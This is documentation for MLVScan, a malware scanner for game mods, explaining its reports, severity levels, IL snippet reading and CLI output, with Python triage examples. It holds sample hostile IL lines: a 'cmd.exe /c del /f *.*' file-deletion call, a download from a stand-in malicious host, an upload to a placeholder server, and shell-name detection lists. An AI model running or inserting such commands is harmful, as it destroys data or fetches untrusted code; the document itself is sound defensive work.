# Scan Reports
When MLVScan detects suspicious patterns in a mod, it generates detailed reports to help you understand the threat and make informed decisions.
Reports are saved in:

```text
YourGame/UserData/MLVScan/Reports/
├── ModName_20231215_123456.report.txt   # Main report
├── Prompts/
│   └── ModName.prompt.md                # LLM analysis prompt
└── IL/
    └── ModName_20231215_123456.il.txt   # Full IL dump (optional)
```
## Console Output

When a suspicious mod is detected, you'll see:

```text
[MLVScan] ======= DETAILED SCAN REPORT =======
[MLVScan] SUSPICIOUS MOD: SuspiciousMod.dll
[MLVScan] SHA256 Hash: abc123def456...
[MLVScan] -------------------------------
[MLVScan] Total suspicious patterns found: 8
[MLVScan] Severity breakdown:
[MLVScan]   CRITICAL: 2 issue(s)
[MLVScan]   HIGH: 3 issue(s)
[MLVScan]   MEDIUM: 3 issue(s)
[MLVScan] -------------------------------
[MLVScan] Suspicious patterns found:
[MLVScan] [CRITICAL] Process execution detected (2 instances)
[MLVScan]   * At: SuspiciousClass::MaliciousMethod
[MLVScan]     Code Snippet (IL):
[MLVScan]       IL_0001: ldstr "cmd.exe"
[MLVScan]       IL_0006: call System.Diagnostics.Process::Start
```
## Report File Contents

The generated `.report.txt` file contains:

- **Header Information**
  - Timestamp
  - Mod filename
  - SHA256 hash
  - File paths
  - Total findings count
- **Severity Breakdown**
  - Count of Critical findings
  - Count of High findings
  - Count of Medium findings
  - Count of Low findings
- **Detailed Findings**
  - Grouped by pattern type
  - Severity level for each pattern
  - Number of instances
  - Specific locations in code
  - IL code snippets
- **Security Notice**
  - Guidance on next steps
  - Community resources
  - Malware removal tools
## Severity Levels

### Critical

**What it means:** Highly dangerous activities that are rarely legitimate in mods.

Examples:
- Executing Windows shell commands
- Loading assemblies from encrypted streams
- Sending data to external servers
- Creating auto-run mechanisms

**Action:** DO NOT WHITELIST without extensive community verification.

### High

**What it means:** Dangerous behaviors that might be legitimate in some contexts.

Examples:
- Starting external processes
- Using reflection to invoke hidden methods
- Modifying Windows registry
- Numeric-encoded strings

**Action:** Investigate thoroughly before whitelisting.

### Medium

**What it means:** Patterns that could be benign or malicious depending on context.

Examples:
- Base64 encoding/decoding
- Hex string manipulation
- Byte array operations
- P/Invoke to native DLLs

**Action:** Review the specific usage. Often false positives for legitimate features.

### Low

**What it means:** Minor patterns with low risk.

Examples:
- Accessing environment variables
- Reading system paths

**Action:** Usually safe to whitelist if from a trusted source.
## Reading IL Snippets

Reports include IL (Intermediate Language) code snippets. Here's how to read them:

```text
IL_0000: ldstr "cmd.exe"          # Load string "cmd.exe"
IL_0005: ldstr "/c del /f *.*"    # Load string "/c del /f *.*"
IL_000a: call Process::Start      # Call Process.Start method
```

Common IL instructions:

| Instruction | Meaning |
|-------------|---------|
| `ldstr`     | Load string |
| `call`      | Call method |
| `callvirt`  | Call virtual method |
| `newobj`    | Create new object |
| `stloc`     | Store to local variable |
| `ldloc`     | Load from local variable |
| `ldc.i4`    | Load integer constant |

**Red Flags:**
- Suspicious strings (URLs, commands, passwords)
- Unusual method calls (Process.Start, Registry.SetValue)
- Obfuscated patterns (numeric-encoded strings)

**Legitimate Use:**
- Game API calls
- Standard .NET operations
- UI operations
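To make the reading rules above concrete, here is an added example (it is not MLVScan's own code or its detection rules) that parses IL lines in the shape the reports print and applies the page's red flags on its severity scale. The sample snippet, the shell-name list and the fully qualified method names it matches are assumptions for illustration.

```python
import re
# Constructed sample in the format MLVScan prints in report snippets
# (not taken from any real mod; trailing "# ..." notes are optional).
SAMPLE_IL = """\
IL_0000: ldstr "cmd.exe"                          # Load string "cmd.exe"
IL_0005: ldstr "/c del /f *.*"
IL_000a: call System.Diagnostics.Process::Start   # Call Process.Start
IL_000f: ldstr "https://collect.example.invalid/up"
IL_0014: newobj System.Net.WebClient::.ctor
IL_0019: callvirt System.Net.WebClient::UploadString
"""

IL_LINE = re.compile(r"^IL_([0-9a-fA-F]{4}):\s+(\S+)(?:\s+(.*))?$")
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell"}   # assumed list

def parse_il(snippet):
    """Yield (offset, opcode, operand) per IL_xxxx line; drop '# ...' notes."""
    for line in snippet.splitlines():
        m = IL_LINE.match(line.strip())
        if m:
            yield m.group(1), m.group(2), (m.group(3) or "").split(" #")[0].strip()

def triage_il(snippet):
    """Return (offset, severity, reason) tuples for the page's red flags, on its
    scale: shell via Process::Start CRITICAL, other Process::Start HIGH, registry
    write HIGH, upload to a server CRITICAL, bare URL string MEDIUM."""
    findings, recent = [], []       # recent: ldstr operands since the last call
    for offset, opcode, operand in parse_il(snippet):
        if opcode == "ldstr":
            text = operand.strip('"')
            recent.append(text)
            if re.match(r"https?://", text):
                findings.append((offset, "MEDIUM", f"URL string {text!r}"))
        elif opcode in ("call", "callvirt"):
            if operand.endswith("Process::Start"):
                shell = any(s.lower() in SHELLS for s in recent)
                findings.append((offset, "CRITICAL" if shell else "HIGH",
                                 "shell command" if shell else "external process"))
            elif operand.endswith(("RegistryKey::SetValue", "Registry::SetValue")):
                findings.append((offset, "HIGH", "registry modification"))
            elif "WebClient::Upload" in operand:
                findings.append((offset, "CRITICAL", "data sent to a server"))
            recent = []             # the call consumed its string arguments
    return findings

def severity_breakdown(findings):
    counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0}
    for _, severity, _ in findings:
        counts[severity] += 1
    return counts
```

Running `triage_il(SAMPLE_IL)` yields a CRITICAL at `IL_000a` (the strings loaded before `Process::Start` name a shell), a MEDIUM for the URL string, and a CRITICAL for the upload call.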
## Common Patterns in Flagged Mods

- **Why flagged:** Uses extensive reflection and dynamic invocation
  - **Pattern:** High severity - Reflection, DllImport, Process operations
  - **Safe to whitelist?** Yes, if from official source
  - **Hash:** Check MLVScan's default whitelist

- **Why flagged:** Loads data from streams, uses Base64
  - **Pattern:** Medium severity - Base64, LoadFromStream, byte arrays
  - **Safe to whitelist?** Yes, if from trusted mod author
  - **Verification:** Review what assets are being loaded

- **Why flagged:** Makes HTTP requests, sends data
  - **Pattern:** Critical severity - DataExfiltration, network calls
  - **Safe to whitelist?** Maybe - investigate what data is sent where
  - **Verification:** Ask mod author about network usage
## Instance Counts and Combinations

**Single instance:** Might be a false positive

```text
[HIGH] Reflection usage detected (1 instance)
```

**Multiple instances:** More concerning

```text
[HIGH] Reflection usage detected (12 instances)
```

Multiple instances suggest the mod heavily relies on suspicious patterns.

**High Risk Combination:**

```text
[CRITICAL] Shell execution (1 instance)
[HIGH] Obfuscated strings (5 instances)
[MEDIUM] Base64 decoding (3 instances)
```

This suggests encoded commands being executed.

**Lower Risk Combination:**

```text
[MEDIUM] Base64 decoding (2 instances)
[LOW] Environment path access (1 instance)
```

Might be loading configuration or assets.
## LLM Analysis Prompt

MLVScan generates a prompt file you can use with ChatGPT or other LLMs:

```text
UserData/MLVScan/Reports/Prompts/ModName.prompt.md
```

- Open the `.prompt.md` file
- Copy the entire contents
- Paste into ChatGPT/Claude/Gemini
- Ask: "Is this malware or a false positive?"

The prompt includes:
- Complete IL dump of the assembly
- List of suspicious findings
- Context about detection rules
- Questions to help analyze intent

Keep in mind:
- LLMs are NOT perfect at detecting malware
- Use as a supplementary tool
- Always verify with the community
- Don't trust AI blindly
## Full IL Dumps

Enable in `MelonPreferences.cfg`:

```toml
[MLVScan]
DumpFullIlReports = true
```

This generates a complete IL disassembly of flagged mods:

```text
UserData/MLVScan/Reports/IL/ModName_timestamp.il.txt
```

Useful for:
- Deep analysis of suspicious code
- Sharing with security researchers
- Understanding complex malware
- Contributing to improved detection rules

Full IL dumps show the entire assembly structure:

```text
.assembly ModName
{
  .ver 1:0:0:0
}
.class public SuspiciousClass
{
  .method public static void MaliciousMethod()
  {
    IL_0000: ldstr "http://malicious.com"
    IL_0005: call WebClient::DownloadString
    ...
  }
}
```
## Decision Flowchart

Use this flowchart to decide what to do:

```text
Mod flagged by MLVScan
│
├─► Critical severity?
│   ├─► Yes → DO NOT WHITELIST
│   │         Ask community first
│   └─► No  → Continue
│
├─► From trusted source?
│   ├─► No  → DO NOT WHITELIST
│   └─► Yes → Continue
│
├─► Multiple users confirm safe?
│   ├─► No  → Wait for verification
│   └─► Yes → Continue
│
├─► Patterns make sense for mod purpose?
│   ├─► No  → DO NOT WHITELIST
│   └─► Yes → Continue
│
└─► Safe to whitelist
    Add SHA256 hash to whitelist
```
## Getting Help

- **Modding Discord:** discord.gg/UD4K4chKak
  - Post in the #mod-releases MLVScan thread
  - Share the SHA256 hash (not the file!)
  - Ask if others have verified it
- **GitHub Issues:** For confirmed false positives
  - Include the hash
  - Include the report file
  - Explain the mod's legitimate purpose
- **Mod Author:** Contact directly
  - Ask about flagged patterns
  - Request an explanation
  - Verify it's the official version
## Best Practices

**Do:**
- Read the entire report carefully
- Check severity levels
- Ask the community
- Verify the mod source
- Keep reports for reference

**Don't:**
- Ignore Critical findings
- Whitelist without understanding
- Share mod files publicly
- Trust unknown sources
- Disable MLVScan entirely
## Example Verdicts

```text
[HIGH] Reflection usage detected (15 instances)
[HIGH] DllImport usage detected (8 instances)
[MEDIUM] Base64 rule triggered (3 instances)
```

- **Verdict:** UnityExplorer - debugging tool
- **Action:** Safe to whitelist (in default whitelist)

```text
[CRITICAL] Shell execution detected (1 instance)
[CRITICAL] Data exfiltration detected (2 instances)
[HIGH] Obfuscated strings detected (12 instances)
```

- **Verdict:** Malicious mod
- **Action:** DELETE AND SCAN SYSTEM

```text
[MEDIUM] Base64 rule triggered (2 instances)
[LOW] Environment path access (1 instance)
```

- **Verdict:** Custom asset loader
- **Action:** Review code, likely safe if from a trusted source
## Developer CLI Reports

When using MLVScan.DevCLI for development scanning, the output format differs from the runtime plugin:

```text
MLVScan Developer Report
========================
Assembly: MyMod.dll
Findings: 2

[High] Detected executable write near persistence-prone directory
  Rule: PersistenceRule
  Occurrences: 1

  Developer Guidance:
  For mod settings, use MelonPreferences. For save data, use the game's
  save system or Application.persistentDataPath with .json extension.

  📚 https://melonwiki.xyz/#/modders/preferences

  Suggested APIs: MelonPreferences.CreateEntry<T>

  Locations:
    • MyMod.SaveManager.SaveSettings:42
────────────────────────────────────────
```

- **Developer Guidance:** Each finding includes specific remediation advice
- **Documentation Links:** Direct links to relevant MelonLoader documentation
- **Alternative APIs:** Suggests safe alternatives to suspicious patterns
- **IsRemediable:** Indicates whether a safe alternative exists
For CI/CD integration, use the `--json` flag:

```json
{
  "assemblyName": "MyMod.dll",
  "totalFindings": 2,
  "findings": [
    {
      "ruleId": "PersistenceRule",
      "description": "Detected executable write near persistence-prone directory",
      "severity": "High",
      "location": "MyMod.SaveManager.SaveSettings:42",
      "guidance": {
        "remediation": "For mod settings, use MelonPreferences...",
        "documentationUrl": "https://melonwiki.xyz/#/modders/preferences",
        "alternativeApis": ["MelonPreferences.CreateEntry<T>"],
        "isRemediable": true
      }
    }
  ]
}
```

For more information on the Developer CLI, see the Developer CLI Guide.
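As an added example of consuming that JSON in a pipeline (this is not part of MLVScan or its CLI), the script below fails the build when any finding is at or above a chosen severity and prints the suggested alternative API for remediable findings. The embedded sample report is constructed from the schema above; its second finding (`Base64Rule`, its location and guidance values) is made up for illustration.

```python
import json
import sys
SEVERITY_RANK = {"Low": 0, "Medium": 1, "High": 2, "Critical": 3}
# Constructed sample of MLVScan.DevCLI --json output using the schema shown above
# (the Base64 finding and its values are made up for the example).
SAMPLE_JSON = """{
  "assemblyName": "MyMod.dll",
  "totalFindings": 2,
  "findings": [
    {"ruleId": "PersistenceRule",
     "description": "Detected executable write near persistence-prone directory",
     "severity": "High", "location": "MyMod.SaveManager.SaveSettings:42",
     "guidance": {"remediation": "For mod settings, use MelonPreferences.",
                  "documentationUrl": "https://melonwiki.xyz/#/modders/preferences",
                  "alternativeApis": ["MelonPreferences.CreateEntry<T>"],
                  "isRemediable": true}},
    {"ruleId": "Base64Rule", "description": "Base64 decoding detected",
     "severity": "Medium", "location": "MyMod.AssetLoader.Load:17",
     "guidance": {"remediation": "Review what is being decoded.",
                  "alternativeApis": [], "isRemediable": false}}
  ]
}"""

def evaluate_report(json_text, fail_on="High"):
    """Parse --json output; return (passed, messages).
    The build fails when any finding is at or above the fail_on severity."""
    report = json.loads(json_text)
    threshold = SEVERITY_RANK[fail_on]
    passed, messages = True, []
    for f in report.get("findings", []):
        # An unknown severity label is treated as Critical rather than ignored.
        rank = SEVERITY_RANK.get(f.get("severity"), SEVERITY_RANK["Critical"])
        line = f"[{f.get('severity')}] {f.get('ruleId')} at {f.get('location')}: {f.get('description')}"
        guidance = f.get("guidance") or {}
        if guidance.get("isRemediable") and guidance.get("alternativeApis"):
            line += " (use " + ", ".join(guidance["alternativeApis"]) + " instead)"
        messages.append(line)
        if rank >= threshold:
            passed = False
    return passed, messages

def main(argv):
    """Usage: gate.py [report.json]; exits 1 when blocking findings exist."""
    text = open(argv[1], encoding="utf-8").read() if len(argv) > 1 else SAMPLE_JSON
    passed, messages = evaluate_report(text, fail_on="High")
    print("\n".join(messages))
    return 0 if passed else 1

if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Pipe the CLI's `--json` output to a file and pass its path as the first argument; with the embedded sample the High finding blocks, while `fail_on="Critical"` would let it through.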
## Related Pages

- Whitelisting - How to whitelist verified mods
- Getting Started - Initial setup
- Architecture - Understanding detection rules
- FAQ - Common questions